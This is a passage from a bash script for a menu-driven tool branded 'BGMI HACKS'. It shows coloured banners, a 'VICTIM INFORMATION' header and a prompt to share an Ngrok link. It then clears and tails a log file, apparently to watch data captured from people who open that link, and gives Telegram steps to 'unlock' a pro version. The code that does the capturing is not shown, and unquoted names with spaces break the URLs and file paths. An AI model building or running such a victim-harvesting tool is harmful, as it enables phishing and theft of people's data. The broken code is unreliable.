echo -e " \e[36mWebsite : \e[0m\e[92mwww.BGMI HACKS.xyz \e[0m\n"
  
echo -e " \e[31mGitHub : \e[0m\e[93mhttps://github.com/BGMI HACKS \e[0m\n"

echo -e " \e[97mTelegram : \e[0m\e[34mhttps://telegram.dog/BGMI HACKS \e[0m\n"
		           echo ""
                           echo -e "\e[96m========================\e[92m VICTIM INFORMATION \e[96m========================= \e[93m"  
			   echo ""
			   echo -e "\e[96m========================\e[92m    TAMJID © 2021    \e[96m=========================\e[92m"
                           echo ""
                           echo ""
			   echo ""
                           echo -e " \e[91m[\e[92m*\e[91m]\e[1;93m \e[0m\e[1;36m Share Ngrok Link and Using "
			   echo ""
                           
                           if [[ -e BGMI HACKS.txt ]]; then
                           > BGMI HACKS.txt
                           fi 
                           echo ""
                           echo ""
                           tail -f BGMI HACKS.txt

                  break;		  
elif [ $option = 50 ] || [ $option = 050 ]
	          then
	                   cd TAMJID/ 
                           echo ""
                           echo -e $" [\e[92m*\e[91m]\e[1;95m How To Unlock Pro Version for Free \e[0m  "
			   sleep 4
			   echo ""
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;92m  1. Join Telegram Channel and Group Message @admin :\e[0m  "
			   echo -e $"     \e[1;32m https://telegram.dog/BGMI HACKS \e[0m  "
			   sleep 2
			   echo ""
			   echo -e $" [\e[1;92m*\e[1;91m]\e[1;93m  2. Unlock Pro Reed This Post : \e[0m   "
			   echo -e $"     \e[1;32m https://telegram.dog/s/BGMI HACKS/ \e[0m   "
			   sleep 2
			   echo ""
			   echo -e $" [\e[92m*\e[91m]\e[1;93m 3. Mail Send :\e[1;36m info@BGMI HACKS.xyz \e[0m  "
                           echo ""
                           sleep 50
			   echo ""
			   
			   

                  break;		  

                elif [ $option = 99 ]
	        then     
	                 echo
       	                 exit 
		break;
		      
                else 
		  
		         echo
		         echo -e "\e[92m[\e[94m!\e[92m]\e[92m Invalid option Try Again !! \e[m "
		         sleep 2
                         exit
		         fi
                         done
